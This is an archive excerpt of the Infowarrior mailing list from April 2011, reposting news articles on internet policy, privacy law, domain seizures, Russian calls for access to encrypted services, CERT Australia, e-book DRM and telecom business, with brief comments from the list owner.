Subject: [Infowarrior] - Woman single-handedly cuts off two countries from Internet
Message-ID: <6FC1824A-B597-4131-861B-F0319AE4038B@infowarrior.org>

You can't make this stuff up!! --- rick

http://digitallife.today.com/_news/2011/04/06/6419851-woman-single-handedly-cuts-off-two-countries-from-internet
http://www.timeslive.co.za/local/article1006491.ece/75-year-old-killed-Georgia-Armenia-internet

Woman single-handedly cuts off two countries from Internet
By Rosa Golijan

A 75-year-old woman recently managed to cut off two countries, Georgia and Armenia, from the Internet by accident. We don't even dare contemplate what she is capable of doing intentionally. The AFP reports that the woman was digging for scrap metal when she came across a fiber optic cable "which runs through Georgia to Armenia."
According to Georgian interior ministry spokesman Zura Gvenetadze, the woman then proceeded to cut into the cable with intentions of stealing it. Based on the AFP's report, it doesn't sound like the woman was attempting to take down anyone's Internet, but she did so anyway and thousands of people in both Georgia and Armenia were forced offline for hours.

As a result, the elderly woman may be facing legal consequences: The woman who was arrested in the village of Ksani has been charged with damaging property and could face up to three years in prison if convicted. "Taking into account her advancing years, she has been released pending the end of the investigation and subsequent trial," Gvenetadze said.

It is worth noting that this isn't the first time that Georgia residents temporarily lost Internet connectivity because of a scrap metal scavenger; a very similar event occurred in 2009.

From rforno at infowarrior.org Wed Apr 6 21:15:12 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 22:15:12 -0400
Subject: [Infowarrior] - Justice Department opposes digital privacy reforms
Message-ID: <5BF7E57F-FDAA-453F-A215-1DDB075A8C64@infowarrior.org>

April 6, 2011 3:39 PM PDT
Justice Department opposes digital privacy reforms
by Declan McCullagh

The U.S. Justice Department today offered what amounts to a frontal attack on proposals to amend federal law to better protect Americans' privacy. James Baker, the associate deputy attorney general, warned that rewriting a 1986 privacy law to grant cloud computing users more privacy protections and to require court approval before tracking Americans' cell phones would hinder police investigations. This appears the first time that the Justice Department has publicly responded to a set of digital privacy proposals unveiled last year by a coalition of businesses and advocacy groups including AT&T, Google, Microsoft, eBay, the American Civil Liberties Union, and Americans for Tax Reform.
< -- >

http://news.cnet.com/8301-31921_3-20051461-281.html

From rforno at infowarrior.org Wed Apr 6 21:27:55 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 22:27:55 -0400
Subject: [Infowarrior] - "Extend and Pretend": The Severe Ramifications of Wall Street's Game
Message-ID: <0A31E516-0C63-40E7-8C17-23B4647F6546@infowarrior.org>

"Extend and Pretend": The Severe Ramifications of Wall Street's Game
http://www.minyanville.com/businessmarkets/articles/extend-and-pretent-recovery-commericial-lending/3/31/2011/id/33692?page=full

From rforno at infowarrior.org Thu Apr 7 07:04:42 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 7 Apr 2011 08:04:42 -0400
Subject: [Infowarrior] - "Operation In Our Sites" Will Continue Seizing Domains
Message-ID:

(Translation: ICE is happy playing Whack-a-Mole and thinking it's an effective tactic. -- rick)

"Operation In Our Sites" Will Continue Seizing Domains
Ernesto, 7/04/2011
http://torrentfreak.com/operation-in-our-sites-will-continue-seizing-domains-11040

ICE director John Morton has confirmed that the seizure of domain names that are alleged to be promoting copyright infringement will continue in the coming years. In a statement before the U.S. House of Representatives, Morton said that "Operation In Our Sites" will continue through and beyond 2011. In addition and contrary to popular belief, Morton claimed that the seizures "respect free speech" and "provide due process."

The US Government is currently considering new legislation to tackle online piracy. As part of this ongoing effort the House of Representatives organized a hearing titled "Promoting Investment and Protecting Commerce Online: Legitimate Sites v. Parasites, Part II." Described by some people as "a parade of strawmen" the hearing focused heavily on Google, and how the search engine should be the one to ensure that online piracy no longer poses a problem.
However, a speaker that also delivered some interesting statements was ICE director John Morton, who has been leading the seizures of piracy-related domain names in the past several months. In his witness testimony Morton explained in detail how more than 100 domains were seized in four separate rounds, starting in June of last year. While omitting to mention that many of the sites simply continued under different domains, Morton said that the seizure banners have led to "public education about pirating" as they had received 38 million hits since the start of the operation.

Another statement of interest from the ICE director is that Operation In Our Sites is here for the long haul. Despite the critique from journalists, activists and politicians, the US Government will continue to seize domains in the future.

"The Operation In Our Sites initiative will continue through 2011 and beyond. ICE's efforts through this operation successfully disrupt the ability of criminals to purvey copyrighted materials illegally over the internet," Morton testified.

"In addition to the domain names that are seized through this operation, evidence suggests that the operation has a deterrent effect. In fact, following Operations In Our Sites v. 1.0, ICE was notified that 81 of the most active websites that had been offering pirated material voluntarily shut down," the ICE director added.

The rest of Morton's statement appears to be an effort to justify the domain seizure procedures, directly responding to the many constitutional questions that were posed, in particular the claimed absence of due process.

"Operation In Our Sites was developed with the Department of Justice to respect free speech, to provide due process, and to work within the statutory framework provided to us by Congress. Domain names seized under Operation In Our Sites are seized only in furtherance of ongoing criminal investigations into violations of U.S. federal laws."
Although ICE's definition of due process appears to differ from that preferred by their critics, Morton gave four examples of how domain owners can attempt to get them back after a seizure. However, in reality this turns out to be more problematic than ICE claims it is. The owner of Torrent-Finder, one of the seized domains, told TorrentFreak that his options are rather limited since he can not rely on "constitutional rights" as an Egyptian. He appealed the seizure from the very start, in November of last year, but thus far the case is moving very slowly.

Overall, ICE believes that the current way of dealing with domains that are possibly connected to copyright infringement is the best option they have. Morton said that based on "tips from industry representatives" among others, they will continue to seize domains that are deemed to support online piracy.

From rforno at infowarrior.org Thu Apr 7 13:57:39 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 7 Apr 2011 14:57:39 -0400
Subject: [Infowarrior] - Old law in the modern day....
Message-ID: <904DE2F3-D0D3-410B-ABE8-95FDE7ACEF84@infowarrior.org>

(More on the Anti-Deficiency Law behind this e-panic: http://www.telegraph.co.uk/news/worldnews/us-politics/8434413/US-government-shutdown-the-law-behind-the-problem.html)

Federal Workers Brace for Email Withdrawal
By JANET ADAMY
http://online.wsj.com/article/SB10001424052748704013604576247192518889036.html

Federal employees are already fretting about a side effect of a possible government shutdown: surrendering their work-issued BlackBerry devices. An administration official said Wednesday that if the government can't avert a shutdown by the weekend, non-essential workers would be asked to report to work Monday and turn over their BlackBerrys, laptop computers and other devices that allow them to access the office computer systems. Then the employees would be sent back home.

"If an employee is furloughed, it is illegal (a criminal violation) for them to work," the official said. In Washington, as in workplaces across the country, email is a vital, if lamented, thread of work and social life, and the prospect of being cut off has some staffers panicked. This wasn't a factor during the shutdowns in the mid-1990s, which happened before email devices were commonplace.

Mary Kahn, a senior public-affairs specialist in the office that administers Medicaid, said (in an email) that she is pondering "a 12-step BlackBerry withdrawal program." Others are preparing to reroute work email to other electronic devices. Like much about the potential shutdown, it isn't yet clear if federal email will continue undisrupted; most government websites won't continue operating.

Speaking about his work BlackBerry, Rodney Whitlock, health-policy director for Iowa Republican Sen. Charles Grassley, said, "I have a Pavlovian response that I swear sometimes I feel like my hip's vibrating when it's not there." Mr. Whitlock also carries a smart phone he pays for himself. His shutdown contingency plan involves forwarding his work email to another address, which he can access with the smart phone. Mr. Whitlock expects others in his office would do the same, because many staffers also have personal cellphones and email devices, such as iPhones.

In some corners of Capitol Hill, workers are whispering that chiefs of staff may go soft on the rule; they would allow workers to keep their electronic lifelines and just discourage pecking. "I don't think every office is going to put a big bucket out and make you put in your BlackBerry," a Senate Democratic aide said.

The Committee on House Administration says House offices "may" require furloughed employees to turn in work BlackBerrys and cellphones and should require them to set an "out of office" message on their email, because such workers aren't permitted to perform official duties by email.
The Committee hasn't said if email rerouting would be allowed. Employees wouldn't be permitted to reroute their email if the purpose was to engage in work, said Salley Wood, a spokeswoman for the committee. Just how far offices can push the line is an open question. Some in Washington say furloughed employees could get away with viewing emails, but not responding to them. "No one knows if you read it," the Democratic Senate aide said.

Carol E. Lee contributed to this article.
Write to Janet Adamy at janet.adamy at wsj.com

From rforno at infowarrior.org Thu Apr 7 20:46:59 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 7 Apr 2011 21:46:59 -0400
Subject: [Infowarrior] - DOJ to Congress: Don't Saddle 4th Amendment on Us
Message-ID:

Justice Dept. to Congress: Don't Saddle 4th Amendment on Us
By David Kravets, April 7, 2011, 4:06 pm
http://www.wired.com/threatlevel/2011/04/fourth-amendment-email-2/

The Obama administration is urging Congress not to adopt legislation that would impose constitutional safeguards on Americans' e-mail stored in the cloud. As the law stands now, the authorities may obtain cloud e-mail without a warrant if it is older than 180 days, thanks to the Electronic Communications Privacy Act adopted in 1986. At that time, e-mail left on a third-party server for six months was considered to be abandoned, and thus enjoyed less privacy protection. However, the law demands warrants for the authorities to seize e-mail from a person's hard drive.

A coalition of internet service providers and other groups, known as Digital Due Process, has lobbied for an update to the law to treat both cloud- and home-stored e-mail the same, and thus require a probable-cause warrant for access. The Senate Judiciary Committee held a hearing on that topic Tuesday. The companies, including Google, AOL and AT&T, maintain that the law should be changed to reflect that consumers increasingly access their e-mail on servers, instead of downloading it to their hard drives, as a matter of course.

But the Obama administration testified that imposing constitutional safeguards on e-mail stored in the cloud would be an unnecessary burden on the government. Probable-cause warrants would only get in the government's way. James A. Baker, associate deputy attorney general, testified:

Congress should recognize the collateral consequences to criminal law enforcement and the national security of the United States if ECPA were to provide only one means, a probable cause warrant, for compelling disclosure of all stored content. For example, in order to obtain a search warrant for a particular e-mail account, law enforcement has to establish probable cause to believe that evidence will be found in that particular account. In some cases, this link can be hard to establish. In one recent case, for example, law enforcement officers knew that a child exploitation subject had used one account to send and receive child pornography, and officers discovered that he had another email account, but they lacked evidence about his use of the second account.

Baker invoked the usual parade of horribles in his argument. "The government's ability to access, review, analyze and act promptly upon the communications of criminals that we acquire lawfully, as well as data pertaining to such communications, is vital to our mission to protect the public from terrorists, spies, organized criminals, kidnappers and other malicious actors," (.pdf) Baker testified.

Don't expect Congress to come out in favor of expanding Americans' civil liberties in the post-Sept. 11 world. CNET reported that Sen. Chuck Grassley (R-Iowa) said demanding warrants would be a burden to law enforcement in addition to "the court system." Congress has held countless hearings about reforming the Patriot Act, too.
In the end, however, lawmakers have repeatedly punted on that issue, and we suspect they will embark on the same course when it comes to reforming ECPA. The judiciary, however, has taken a different course. A federal appeals court in December ruled that e-mails were protected by the warrant requirement. That decision by the 6th U.S. Circuit Court of Appeals became law March 21. It affects Kentucky, Michigan, Ohio and Tennessee.

From rforno at infowarrior.org Fri Apr 8 18:09:34 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 8 Apr 2011 19:09:34 -0400
Subject: [Infowarrior] - Russian spy agency complains about Gmail, Skype
Message-ID:

UPDATE 1-Russian spy agency complains about Gmail, Skype
2:39pm EDT
By Guy Faulconbridge
http://www.reuters.com/article/2011/04/08/russia-internet-idUSLDE7371QW20110408

MOSCOW, April 8 (Reuters) - Russia's domestic security service called for access to encrypted communication providers like Gmail, Hotmail and Skype on Friday, saying the uncontrolled use of such services could threaten national security. The proposal by the main successor to the Soviet-era KGB secret police raised concerns some senior Russian officials would like to limit Internet access to stave off any potential protests ahead of the 2012 presidential election.

"Different software is being distributed allowing the encryption of traffic: that is services including Gmail, Hotmail and Skype," Alexander Andreyechkin, the head of the Federal Security Service's special communications centre, was quoted as saying by state RIA news agency. "The uncontrolled use of these services could lead to a large-scale threat to Russian security," RIA quoted Andreyechkin as telling a Russian government commission on technology.

Communications Minister Igor Shchyogolev said Russia had no plans to ban Google Inc's (GOOG.O) Gmail, Microsoft Corp's (MSFT.O) Hotmail service or Skype Ltd's Skype service.

"There are no plans to cancel or close Skype, Gmail and Hotmail or any other foreign services working in Russia," Shchyogolev said in a statement. He added officials were simply studying how to regulate the new technologies.

A Kremlin source said the FSB proposal was so radical it did not even merit comment, but after a major cyber attack on prominent hosting website LiveJournal many Internet users in Russia said they are worried. President Dmitry Medvedev's own blog on LiveJournal was crippled on Wednesday for at least an hour by a "denial of service" attack which he said was "revolting and illegal".

"LIKE IN CHINA"

The FSB proposal provoked a wave of negative comments in the Russian language Internet, with many saying Russia could follow China's attempts to limit the Internet. "We shall live as they do in China but only without the Chinese economy, without any prospects and without the shooting of those who are corrupt," said troublemakerno1 in Russian in an Internet discussion on www.mail.ru.

Prime Minister Vladimir Putin's spokesman Dmitry Peskov said there was no cause for alarm. "There is no reason to be worried," Peskov said. "The FSB has a point of view: there are other points of view too. They are all going to be discussed."

But tight state control of television means the Internet is one of the only areas where Russians can vent often scathing criticism of Putin, Medvedev and the Russian elite. Russia has at least 50 million Internet users out of a population of nearly 143 million and LiveJournal hosts more than 4.7 million Russian bloggers.

LiveJournal said it had been the victim of large-scale attacks, some of which it believed were political. Svetlana Ivannikova, head of LiveJournal Russia, said lawyers were preparing a report for the Interior Ministry on the attacks. Diplomats told Reuters the attacks on LiveJournal had all the hallmarks of a highly organised, well-financed cyber attack.
Security experts say Russia has an advanced cyber warfare unit made up of hackers who the security forces have enticed to work for the state. Opposition politicians said the authorities may be testing their ability to disrupt the Internet communications which played a prominent role in the uprisings across the Middle East and the Arab world.

(Additional reporting by Denis Dyomkin; Editing by Steve Gutterman)

From rforno at infowarrior.org Sat Apr 9 09:13:11 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 9 Apr 2011 10:13:11 -0400
Subject: [Infowarrior] - This is What a Tweet Looks Like
Message-ID:

This is What a Tweet Looks Like
By Sarah Perez / April 19, 2010 8:33 AM

Think a tweet is just 140 characters of text? Think again. To developers building tools on top of the Twitter platform, they know tweets contain far more information than just whatever brief, passing thought you felt the urge to share with your friends via the microblogging network. A tweet is filled with metadata - information about when it was sent, by who, using what Twitter application and so on. Now, thanks to Raffi Krikorian, a developer on Twitter's API/Platform team, you can see what a tweet looks like, in all its data-rich detail.
< - >

http://www.readwriteweb.com/archives/this_is_what_a_tweet_looks_like.php

From rforno at infowarrior.org Sun Apr 10 16:56:29 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 10 Apr 2011 17:56:29 -0400
Subject: [Infowarrior] - E-book business should take a page from music industry and go DRM-free
Message-ID: <0E14524A-E203-4109-BCCB-F77887097B98@infowarrior.org>

E-book business should take a page from music industry and go DRM-free
By Rob Pegoraro, Friday, April , 9:42 AM
http://www.washingtonpost.com/e-book-business-should-take-a-page-from-music-industry-and-go-drm-free/2011/04/05/AFBRbG1C_print.html

I've done my part to prop up the consumer-electronics industry in recent years: a flat-panel TV downstairs and one upstairs, his and hers smartphones, not-too-obsolete digital cameras, a desktop computer upstairs and an iPad 2 downstairs (well, once it gets off back order).

But one thing is missing from this electronic inventory: a Kindle, a Nook or any sort of e-book reader.

That's not an accident. The e-book business seems determined to repeat the early mistakes of the music industry with "digital rights management" restrictions. But this time around, I don't feel compelled to back their early investments with my own money.

Think back to how the first good, mass-market music-download store worked. Apple's iTunes Store seemed like a revelation compared with earlier, listener-hostile efforts, simply because it let you listen to your purchases in most cases. All you had to do was consent to listen to songs bought off iTunes only on the five computers you'd authorized with your account, plus any iPods or iPhones you owned.

Those restrictions started to grate on some users. Then Steve Jobs admitted he wasn't a fan of DRM himself, one major label decided it could do without it as well, Amazon launched an entirely DRM-free MP3 store . . . and less than two years later, DRM vanished from iTunes, too.

Somehow, the recorded-music business did not perish.
Digital sales should finally pass CD sales next year.

E-books haven't come as far along. If you buy a title from Amazon's Kindle Store, Barnes & Noble's Nook bookstore or Apple's iBookstore, among others, the DRM attached to it will prevent you from reading that book on another company's software or hardware.

That might not seem like a problem today. Amazon makes a pretty good e-book reader today in the Kindle and has since shipped software for a growing variety of computers and smartphones. But do you trust it to lead that category of hardware and software for as long as you'd want to reread that book?

E-book DRM also disables many functions common to paper books or other electronic documents. Most stores don't let you copy text from a book to quote elsewhere, although Barnes & Noble is a welcome exception. Printing? Forget it, unless you go to the trouble of placing an e-reader face down in a copier, one page at a time.

Lending is limited to those titles for which a publisher has authorized it and comes with condescendingly strict limits that most librarians would not recognize. For example, Amazon permits only one 14-day loan per authorized title, ever. Reselling an e-book? Forget it.

All those limits and lock-ins make an e-book with DRM a dubious deal. Why would I want to pay almost as much as for a paper book - in some cases more - and then have my purchase constrain its usefulness and therefore cut its value?

Some smaller publishers haven't bought into DRM, just as independent record labels never saw the point of it. Tech publisher O'Reilly and Associates of Sebastopol, Calif., sells titles on its own site and through such outlets as the Kindle Store without any "protection."

Has the company lost any sales? In a nutshell, no. E-book sales had grown to more than 10 times print sales on O'Reilly's site by the end of 2010, wrote Vice President Andrew Savikas.

The mainstream sites are showing some signs of being open to removing DRM.
Amazon, Apple and Barnes & Noble now all allow publishers to opt out of DRM. Apple even defaults to omitting DRM, although it takes only one click for a publisher to restore that.

But good luck finding out whether a potential purchase comes with the usual digital locks. Apple and Barnes & Noble provide zero indication of an e-book's DRM status in their stores. On the Kindle Store, you might get lucky and find that a book's title notes that virtue, or that a publisher has thought to tag that page with a "drmfree" label.

But most publishers don't give their own authors that option. My colleague Joel Achenbach's new book "A Hole at the Bottom of the Sea" sailed into the Kindle Store with DRM intact because he never had a choice - he was never asked. His agent, Michael Congdon, said major publishers don't negotiate that.

Maybe most authors would choose DRM anyway. Dan Pacheco, chief executive of Boulder, Colo.-based BookBrewer, wrote that his Internet-publishing startup will provide an author's work without DRM, "but no author has done that to date."

There is one way to settle this discussion. Give customers a clear choice, let the market work, and the book business might discover that it can read the recording industry's sheet music.

robp at washpost.com

© 2011 The Washington Post Company

From rforno at infowarrior.org Sun Apr 10 18:23:44 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 10 Apr 2011 19:23:44 -0400
Subject: [Infowarrior] - Groklaw To Close May 16
Message-ID: <8DA69740-0EA5-4ED6-9AAB-795EE5D7FAB2@infowarrior.org>

Groklaw Calls it a Day, To Close May 16
posted by Thom Holwerda on Sun 10th Apr 2011 19:57 UTC, submitted by PLan
http://www.osnews.com/story/24623/Groklaw_Calls_it_a_Day_To_Close_May_16

Should I be sad or relieved? Groklaw, the website that played a central role in the SCO vs. sanity case, has just announced it will close up shop on May 16 of this year.
Groklaw's place in history has been secured, surely, but in recent years, the site became more and more like a relic from the past, clearly stuck in the everyone vs. Microsoft mindset of the late '90s and early 2000s. Even in today's announcement post, Groklaw shows that its time has indeed come.

I've never been an unequivocal fan of Groklaw, for the simple reason that its author, PJ, pretty much saw Microsoft's hand in everything. However, this does not negate the fact that Groklaw has played a crucial role in the SCO case; PJ uncovered several pieces of important evidence in the case, which even led to SCO targeting her on a more personal level.

Despite these accomplishments, the site started losing its edge the past few years - in my eyes, at least. PJ is still entirely hung up on Microsoft, even in today's announcement post. She goes on and on about how Microsoft is trying to destroy Android, and keeps on talking about the mobile space as if it's Microsoft vs. Linux, stating that Groklaw isn't needed because Android has beaten Microsoft. This makes no sense - Microsoft was already beaten long before Android came onto the market. Android is beating iOS and BlackBerry, not Microsoft.

Still, credit where credit is due. "No matter what happens next, I know that we changed the course of history. How many people get to say that? I never expected it, frankly, and I am grinning just thinking about how much fun we've had doing it," PJ writes, "Our work will be available for historians permanently, so the impact we had isn't over today, and someday we'll tell our grandkids that we were part of this, part of Groklaw. We are in the history books. Our work will continue as long as anyone cares about this unique time period in the history of computer software, a history that we are a part of forever. And that is a long, long time."

Thank you, PJ, for your work, and good luck with any future endeavours.
From rforno at infowarrior.org Mon Apr 11 12:59:11 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 11 Apr 2011 13:59:11 -0400
Subject: [Infowarrior] - Inside AUSCERT
Message-ID: <464C97D4-6842-4595-8533-98FDAC24706D@infowarrior.org>

Inside CERT Australia
Darren Pauli, ZDNet.com.au on April 11th, 2011
http://www.zdnet.com.au/inside-cert-australia_print-339311895.htm

The Australian Government has a list of software holes that are so sensitive they're kept hidden from the public.

These weaknesses are being used by criminals to steal our money and our data. They may even be a cornerstone to planned attacks on critical infrastructure, like energy, water and transport. But in the murky battle between those that protect us and those who seek to harm, these vulnerabilities are also the bait with which cyber-criminals are caught.

The agency that keeps tabs on the vulnerabilities is the Computer Emergency Response Team (CERT) Australia, formed in 2009 to be a trusted ear in which organisations from around the world could whisper information on ruinous security threats that would otherwise remain secret. It functions also as a clearing house for security notifications from other CERTs around the world.

Yet we don't hear much about it. Since its inception, the agency has kept tight-lipped on its operations, and not without cause.

The agency has knowledge of security vulnerabilities that, if publicly disclosed, could grind significant elements of cyber crime to a halt. The holes could pull the rug from industry scourges like spam and fraud botnets, and prevent possible hacking attacks on the nation's big four banks and countless corporate giants.

But in the game of security subterfuge, the vulnerabilities may be more valuable if they are kept hidden and used as a means to track skittish cyber criminals. The inevitable risk that withholding the threat places on you and me can be worth it for the chance to take down a big target.
"The reason some vulnerabilities are confidential is the minute the bad guys know people have tripped over them, they will change their techniques," says Mike Rothery, of the Attorney-General's Department whose division has responsibility for CERT Australia headed by Ms Deborah Anton. "If the vulnerabilities were known, criminals could go and write malware for it before it is fixed."

The information is even withheld from the global CERT community, which has chapters in most countries. It is typically disclosed once the threat of exposure is deemed to have fallen, a decision that is reviewed on a daily basis.

Yet some victims are too valuable to be sacrificial lambs. Australia cannot afford to suffer damage to its critical infrastructure, including power, water, energy, telecommunications and transport. The impact of a network attack on these could be devastating, and CERT Australia's job is to keep them informed on these sensitive security threats.

"If we become aware of control nodes for botnets or those that harvest data that is being exfiltrated out of a network, we will pass that information on so that it can be blocked at firewalls and organisations can see if they have a compromised machine," Rothery said. "We need to allow organisations to exploit known information on threats through our advisories for as long as possible."

The agency issued 23 security advisories in the last six months of varying severity to a handful of state and private sector organisations that are listed in the Attorney-General's "Trusted Information Sharing Network". Those privy to the information must sign non-disclosure agreements.

"We are not just restating things you will get from security bulletins from hardware and software vendors. It may include additional information about a vendor patch which, although the company may not publicly say, will mitigate a nasty vulnerability that has the potential to be exploited."
Australia's critical infrastructure operators will be tipped off to the presence of these silent patches and told to implement them immediately. Some organisations may take months to roll out the same fix, or even ignore it completely.

The privileged group of more than 300 companies under CERT Australia's wing is expanding, but it does not plan to offer the secretive information more broadly. It chooses organisations based primarily on the importance they hold to Australia, and then by the likelihood that they will be attacked.

This process is fluid, so if CERT Australia notices an attack targeting, for instance, a coal excavation company it will bring it into the fold, and then look to neighbouring miners that may also be targeted.

The mining sector is currently under consideration to be covered by CERT Australia, along with major banks.

"The effects on the community if someone attacks mining would be significant," Rothery said.

Discussions with the finance sector have only recently emerged, and surprisingly centre on the physical security of the industry datacentres. One of the specific concerns is how a bank may protect or deal with an attack against an air-conditioning system charged with the vital role of keeping a datacentre cool.

Once an organisation has joined CERT Australia, it may be invited to send its engineers off to get hands-on experience dealing with complex and targeted attacks against SCADA infrastructure at the United States Government's Idaho National Laboratory - the same lab used to create the Stuxnet worm, according to the New York Times.

To date, 200 people have been trained courtesy of the Federal Government and a further 30 will be sent this year. Rothery said the training has a ripple effect, since those trained will likely move through industries and help teach others how to protect SCADA networks.

The agency will also turn its focus onto consumers, creating many government-run public security education campaigns.
It will produce books and alerts that form the backbone of campaigns such as Fraud Awareness Week. CERT's "toe in the water" was the booklet "Protecting Yourself Online", produced during cybersafety awareness week. It will be updated this year to include the internet service provider iCode agreement.

It will also produce business and consumer advisories through the Stay Smart Online website, which has been the stomping ground of AusCERT. Rothery said the advisories will "supplement" AusCERT notices.

URL: http://www.zdnet.com.au/inside-cert-australia-339311895.htm

From rforno at infowarrior.org Mon Apr 11 13:16:30 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 11 Apr 2011 14:16:30 -0400
Subject: [Infowarrior] - Level 3 to Buy Global Crossing in $3 Billion Deal
Message-ID:

April 11, 2011, 8:25 am
Level 3 to Buy Global Crossing in $3 Billion Deal
By DEALBOOK
http://dealbook.nytimes.com/2011/04/11/level-3-to-buy-global-crossing-in-3-billion-deal/

Level 3 Communications announced on Monday that it would buy Global Crossing in a transaction worth $3 billion.

The deal values Global Crossing at $23.04 a share - about 56 percent above the telecommunication company's closing price on Friday. As part of the acquisition, Level 3 will also assume $1.1 billion of debt.

The deal would combine the two companies' fiber-optic networks over three continents, offering data and voice connections to more than 70 countries. The combined entity will create a company with revenue of $6.26 billion and earnings of $1.57 billion, after taking into account projected cost savings.

"This is a transformational combination that we believe will deliver significant value to the investors, customers and employees of both Level 3 and Global Crossing," James Q. Crowe, chief executive of Level 3, said in a statement. "The complementary fit between the two companies' networks, service portfolios and customers is compelling."

Level 3 shares rose 12 percent in premarket trading.
Global Crossing was up 59 percent.

Level 3 already has significant shareholder support. Singapore Technologies Telemedia, Global Crossing's largest investor with a stake of about 60 percent, has agreed to vote in favor of the acquisition. Once the deal closes, ST Telemedia is to nominate directors to the board, relative to the size of its stake.

"This strategic combination is an important milestone for both Global Crossing and Level 3, and a value-creating proposition for all stakeholders," Lee Theng Kiat, chief executive officer of Singapore Technologies Telemedia, said in a statement. "Going forward, we believe the combined strengths of the two companies will position it in a very favorable, competitive position to expand in the U.S. and compete globally."

Singapore Technologies Telemedia bought the stake in Global Crossing out of bankruptcy in 2003. Once a high-flying network operator, Global Crossing stumbled in the aftermath of the dot-com bust, filing for chapter 11 in early 2002.

Level 3's advisers included Bank of America Merrill Lynch, Citigroup and Morgan Stanley; Rothschild provided the fairness opinion; and Willkie Farr & Gallagher was the legal adviser. Goldman Sachs advised Global Crossing, while Latham & Watkins served as the company's legal adviser. Singapore Technologies Telemedia worked with Credit Suisse Securities.
From rforno at infowarrior.org Tue Apr 12 09:26:57 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 12 Apr 2011 10:26:57 -0400
Subject: [Infowarrior] - TSA still groping kids
Message-ID: <6D72BE10-3756-4549-BBF3-6DEB769918A2@infowarrior.org>

Video -- TSA still groping kids
http://www.youtube.com/watch?v=ba030UmbkCo

From rforno at infowarrior.org Tue Apr 12 15:11:57 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 12 Apr 2011 16:11:57 -0400
Subject: [Infowarrior] - Democratic senator wants Internet sales taxes
Message-ID:

April 12, 2011 4:00 AM PDT
Democratic senator wants Internet sales taxes
by Declan McCullagh
http://news.cnet.com/8301-31921_3-20052999-281.html

A Democratic senator is preparing to introduce legislation that aims to end the golden era of tax-free Internet shopping.

The proposal--expected to be made public soon after Tax Day--would rewrite the ground rules for Internet and mail order sales by eliminating the ability of Americans to shop at Web sites like Amazon.com and Overstock.com without paying state sales taxes.

Dick Durbin of Illinois, the second most senior Senate Democrat, will introduce the bill after the Easter recess, a Democratic aide told CNET.

"Why should out-of-state companies that sell their products online have an unfair advantage over Main Street bricks-and-mortar businesses?" Durbin said in a speech in Collinsville, Ill., in February. "Out-of-state companies that aren't paying their fair share of taxes are sticking Illinois residents and businesses with the tab."

At the moment, Americans who shop over the Internet from out-of-state vendors aren't always required to pay sales taxes at the time of purchase. Californians buying books from Amazon.com or cameras from Manhattan's B&H Photo, for example, won't pay the sales taxes at checkout time that they would if shopping at a local mall--which is what Durbin means by giving online retailers an "unfair advantage."
On the other hand, there are some 7,500 different taxing jurisdictions in the United States, each with a set of very precise rules describing what can and can't be taxed and at what rate. That makes it challenging terrain for retailers to navigate. In New Jersey, for instance, bottled water and cookies are exempt from sales tax (PDF), but bottled soda and candy are taxable. In Rhode Island, buying a mink handbag is taxed, but a mink fur coat is not (PDF).

Durbin's bill will be called the Main Street Fairness Act, which follows legislation introduced last July in the House of Representatives bearing the same name. A possible co-sponsor is Sen. Mike Enzi, a Wyoming Republican who backed a similar proposal before and did not respond to a request for comment. (See related update below.)

Making matters more difficult for the pro-tax forces is the decision by Rep. William Delahunt, a Massachusetts Democrat, not to run for reelection last year. Delahunt was probably Congress' most enthusiastic proponent of Internet sales taxes, and it's not clear a Republican-controlled House will be as eager to embrace the idea.

One early indication: Rep. Dan Lungren, a California Republican, introduced legislation in February saying that allowing states to levy "onerous and burdensome sales tax collecting schemes on Internet-enabled small businesses that do not even reside in their state would adversely impact hundreds of thousands of jobs." Former GOP presidential candidate Ron Paul is one of the sponsors.

The Direct Marketing Association, which sued Colorado last year to block a state tax law from taking effect, is preparing to rally opposition to Durbin's legislation.

"You're just giving the states a blank check to make changes without any congressional oversight," says Jerry Cerasale, the DMA's senior vice president for government affairs. "We oppose that...We think that's abrogating the authority of Congress."
In response to complexity concerns, the pro-tax forces have offered a proposal that they hope Congress can be persuaded to adopt. The concept is called the Streamlined Sales Tax Agreement, which was invented in 2002 by state tax officials hoping to straighten out some of sales tax laws' most notorious convolutions.

Since then, some 24 states have signed on, either wholly or partially, to the agreement, meaning they have agreed to simplify their tax codes and make them uniform. If enough states participate, proponents believe it will ease concerns about complexity and make it easier to convince Congress to make sales collection mandatory for out-of-state retailers.

Paul Misener, vice president of public policy for Amazon, says his employer isn't necessarily opposed to such legislation--as long as it's crafted very carefully. "We've long supported a truly simple, nationwide sales tax system, evenhandedly applied," he says.

The current legal and political landscape was shaped by a 1992 case called Quill v. North Dakota, in which the U.S. Supreme Court ruled: "Congress is now free to decide whether, when, and to what extent the states may burden interstate mail order concerns with a duty to collect use taxes."

Under the Quill ruling, out-of-state retailers generally don't have to collect taxes. One exception to that rule is a legal concept called "nexus," which means a company can be forced to collect sales taxes if it has a sufficient business presence, which is why Amazon doesn't have an office in California. (Another exception is the sale of cigarettes, which is covered by the Jenkins Act.)

An important caveat is that under existing law, online purchases from sites like Amazon and eBay only seem to arrive tax-free. Legally, however, purchasers are required to pay their own state's sales tax rate--the concept is called a "use tax"--and then voluntarily report the amount owed at tax time. Few do.
Support for Durbin's forthcoming legislation is likely to come from the Alliance for Main Street Fairness and like-minded companies including Wal-Mart and Best Buy.

"Big box stores love to mobilize smaller booksellers to complain about competing with Amazon," says Steve DelBianco, executive director of the NetChoice coalition, which counts eBay, Overstock.com, and Yahoo as members. "The irony is that those small booksellers have been clobbered by big box stores. The Internet's their friend."

Update 10:30 a.m. PT: I've heard back from Sen. Mike Enzi's office. It sent me e-mail this morning saying: "Senator Enzi plans to co-sponsor the Main Street Fairness bill with Senator Durbin. As far as a timeline or drafts, you'll have to check with Senator Durbin's office."

